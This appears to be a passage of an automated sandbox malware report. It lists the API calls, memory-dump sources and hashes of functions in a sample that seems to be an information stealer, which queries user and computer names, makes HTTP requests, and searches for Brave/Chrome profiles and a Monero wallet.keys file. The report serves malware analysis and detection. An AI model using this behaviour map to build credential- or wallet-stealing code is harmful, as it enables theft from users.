                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                      • String ID:
                      • API String ID: 941982115-0
                      • Opcode ID: 8b2f61df810dfc045d0e74668b9466c6205055969d374fb39aefd668b5200a49
                      • Instruction ID: e8bbb8be2741014d91c53b143306210d14da6db4750cf8ac2d2e03e7ca8cd54f
                      • Opcode Fuzzy Hash: 8b2f61df810dfc045d0e74668b9466c6205055969d374fb39aefd668b5200a49
                      • Instruction Fuzzy Hash: 51F03A7094060DBBEB30AFA0AC0ABBD7B74EF54701F106524F713B6581CBB05580D655
                      Function 00EE47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EE4839
                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00EE4849
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CrackInternetlstrlen
                      • String ID: <
                      • API String ID: 1274457161-4251816714
                      • Opcode ID: ad53b70ae0f8740461c8abd1be90ee5ad34e871f03433f461af16a2cadc0116c
                      • Instruction ID: fd469ff52d537478b7cdb1dd86362e785c0f5d4ee927a3514a23dbb949d98134
                      • Opcode Fuzzy Hash: ad53b70ae0f8740461c8abd1be90ee5ad34e871f03433f461af16a2cadc0116c
                      • Instruction Fuzzy Hash: 232100B1D01209ABDF14DFA5E845ADE7778FF45310F109625F525BB280DB706609CB91
                      Function 00EF51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE6280: InternetOpenA.WININET(00F00DFE,00000001,00000000,00000000,00000000), ref: 00EE62E1
                        • Part of subcall function 00EE6280: StrCmpCA.SHLWAPI(?,0168E470), ref: 00EE6303
                        • Part of subcall function 00EE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EE6335
                        • Part of subcall function 00EE6280: HttpOpenRequestA.WININET(00000000,GET,?,0168DA40,00000000,00000000,00400100,00000000), ref: 00EE6385
                        • Part of subcall function 00EE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EE63BF
                        • Part of subcall function 00EE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EE63D1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EF5228
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                      • String ID: ERROR$ERROR
                      • API String ID: 3287882509-2579291623
                      • Opcode ID: 43db05c2fa6cdbbf861f69a3fda4840af78d60ee316789f152415d036ac2813c
                      • Instruction ID: 413811d2f9ad1f195c93981ff491b3e70c1115478e78951135e35cbfa4a28927
                      • Opcode Fuzzy Hash: 43db05c2fa6cdbbf861f69a3fda4840af78d60ee316789f152415d036ac2813c
                      • Instruction Fuzzy Hash: 05114F7180054CA6DB18FF60DC52AFC33B8AF50340F449168FA0E6A1A2EF70AB09C691
                      Function 00EE1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EE112B
                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00EE1132
                      • ExitProcess.KERNEL32 ref: 00EE1143
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$AllocCurrentExitNumaVirtual
                      • String ID:
                      • API String ID: 1103761159-0
                      • Opcode ID: 05f22e5cf6cc8229baf70f6e791edeaa3ba87bbc5a67e31870a62703207aed83
                      • Instruction ID: 90dd0a9e5c461cbb45debff47b44a4dfd039fb3ce5c1336501cf25d4bec317fe
                      • Opcode Fuzzy Hash: 05f22e5cf6cc8229baf70f6e791edeaa3ba87bbc5a67e31870a62703207aed83
                      • Instruction Fuzzy Hash: 9BE0E67094534CFBE7346FA1AC0AB0D76B8AF04B06F105094F709B75C4D6F526909799
                      Function 00EE10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00EE10B3
                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00EE10F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Virtual$AllocFree
                      • String ID:
                      • API String ID: 2087232378-0
                      • Opcode ID: 1eab06e7b0de29b5debbc66b8f9693402df43a272ccb6b2eb17305129c7053cc
                      • Instruction ID: 9b7c1809cd91cf4b2af5cd1120b8a9fc1f9546f6c5952229d8cc612fd11a4ecc
                      • Opcode Fuzzy Hash: 1eab06e7b0de29b5debbc66b8f9693402df43a272ccb6b2eb17305129c7053cc
                      • Instruction Fuzzy Hash: 15F0E271641248BBEB249AA4AC49FBBB7E8E709B15F301458F604E3280D5729E80CBA4
                      Function 00EE1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF7910
                        • Part of subcall function 00EF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00EF7917
                        • Part of subcall function 00EF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00EF792F
                        • Part of subcall function 00EF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EE11B7), ref: 00EF7880
                        • Part of subcall function 00EF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00EF7887
                        • Part of subcall function 00EF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EF789F
                      • ExitProcess.KERNEL32 ref: 00EE11C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                      • String ID:
                      • API String ID: 3550813701-0
                      • Opcode ID: 03f54a59d7b9b9b96a8b20b6e283e843348482d52f2c750a3f94fb9a86e466fb
                      • Instruction ID: 15b76706dbf3fcad6f1a98c415a33c82df87599e429c9776fa923c1d3a7525f0
                      • Opcode Fuzzy Hash: 03f54a59d7b9b9b96a8b20b6e283e843348482d52f2c750a3f94fb9a86e466fb
                      • Instruction Fuzzy Hash: 7EE0E675A1425963CA2876B17D06B3632DC9F14389F041464F705E3502FA35E4608665

                      Non-executed Functions

                      Function 00EF38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 00EF38CC
                      • FindFirstFileA.KERNEL32(?,?), ref: 00EF38E3
                      • lstrcat.KERNEL32(?,?), ref: 00EF3935
                      • StrCmpCA.SHLWAPI(?,00F00F70), ref: 00EF3947
                      • StrCmpCA.SHLWAPI(?,00F00F74), ref: 00EF395D
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EF3C67
                      • FindClose.KERNEL32(000000FF), ref: 00EF3C7C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                      • API String ID: 1125553467-2524465048
                      • Opcode ID: cc42c2c81c8c174c4b8e6992f40fa041eef0cea471955c532d3b62e9c4fc9f91
                      • Instruction ID: b49d9cb88e8b1f871a536d05c7d65511fdf0944c6c12d56c778462fba8a49610
                      • Opcode Fuzzy Hash: cc42c2c81c8c174c4b8e6992f40fa041eef0cea471955c532d3b62e9c4fc9f91
                      • Instruction Fuzzy Hash: 75A12FB190020CABDB34DF64DC85FFA73B8AF88301F444598E61DA6145EB759B94CF62
                      Function 00EEBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • FindFirstFileA.KERNEL32(00000000,?,00F00B32,00F00B2B,00000000,?,?,?,00F013F4,00F00B2A), ref: 00EEBEF5
                      • StrCmpCA.SHLWAPI(?,00F013F8), ref: 00EEBF4D
                      • StrCmpCA.SHLWAPI(?,00F013FC), ref: 00EEBF63
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EEC7BF
                      • FindClose.KERNEL32(000000FF), ref: 00EEC7D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                      • API String ID: 3334442632-726946144
                      • Opcode ID: a82d58d367471e793aa7385e9907eef1d1055a23bcc6deca941efa2a6d576bbc
                      • Instruction ID: d18987ebf0c518e2d6e0cb5eee3fc48f2e76285b2b2a656f10fe1eeb66487ab3
                      • Opcode Fuzzy Hash: a82d58d367471e793aa7385e9907eef1d1055a23bcc6deca941efa2a6d576bbc
                      • Instruction Fuzzy Hash: 7E4255B250014CA7CB18FF60DD56DFD73B8AF84300F449578B60AB6195EE74AB49CB92
                      Function 00EF4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 00EF492C
                      • FindFirstFileA.KERNEL32(?,?), ref: 00EF4943
                      • StrCmpCA.SHLWAPI(?,00F00FDC), ref: 00EF4971
                      • StrCmpCA.SHLWAPI(?,00F00FE0), ref: 00EF4987
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EF4B7D
                      • FindClose.KERNEL32(000000FF), ref: 00EF4B92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s$%s\%s$%s\*
                      • API String ID: 180737720-445461498
                      • Opcode ID: fdf57ed8b184f877d5a8025b1525afb05b5981251cf61d78ba888e0e74934cd2
                      • Instruction ID: 7ec375efb67ba399207e4d8489f2a4ead8080fb14898861abe4838f52adc358d
                      • Opcode Fuzzy Hash: fdf57ed8b184f877d5a8025b1525afb05b5981251cf61d78ba888e0e74934cd2
                      • Instruction Fuzzy Hash: C76135B1500219ABCB34EFA0EC45FFA73BCBF88701F004598E619A6185EB71DB959F91
                      Function 00EF4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EF4580
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF4587
                      • wsprintfA.USER32 ref: 00EF45A6
                      • FindFirstFileA.KERNEL32(?,?), ref: 00EF45BD
                      • StrCmpCA.SHLWAPI(?,00F00FC4), ref: 00EF45EB
                      • StrCmpCA.SHLWAPI(?,00F00FC8), ref: 00EF4601
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EF468B
                      • FindClose.KERNEL32(000000FF), ref: 00EF46A0
                      • lstrcat.KERNEL32(?,0168E460), ref: 00EF46C5
                      • lstrcat.KERNEL32(?,0168D4A0), ref: 00EF46D8
                      • lstrlen.KERNEL32(?), ref: 00EF46E5
                      • lstrlen.KERNEL32(?), ref: 00EF46F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                      • String ID: %s\%s$%s\*
                      • API String ID: 671575355-2848263008
                      • Opcode ID: f77b357efaf514c638021ba2d1a74a08134dff5de260eeddfc10c5d89e3b7d27
                      • Instruction ID: 25d6651ae1f16c4a35b31e08b3ee7a2a3613f5e4da7a5c05ffb609c0616d7e27
                      • Opcode Fuzzy Hash: f77b357efaf514c638021ba2d1a74a08134dff5de260eeddfc10c5d89e3b7d27
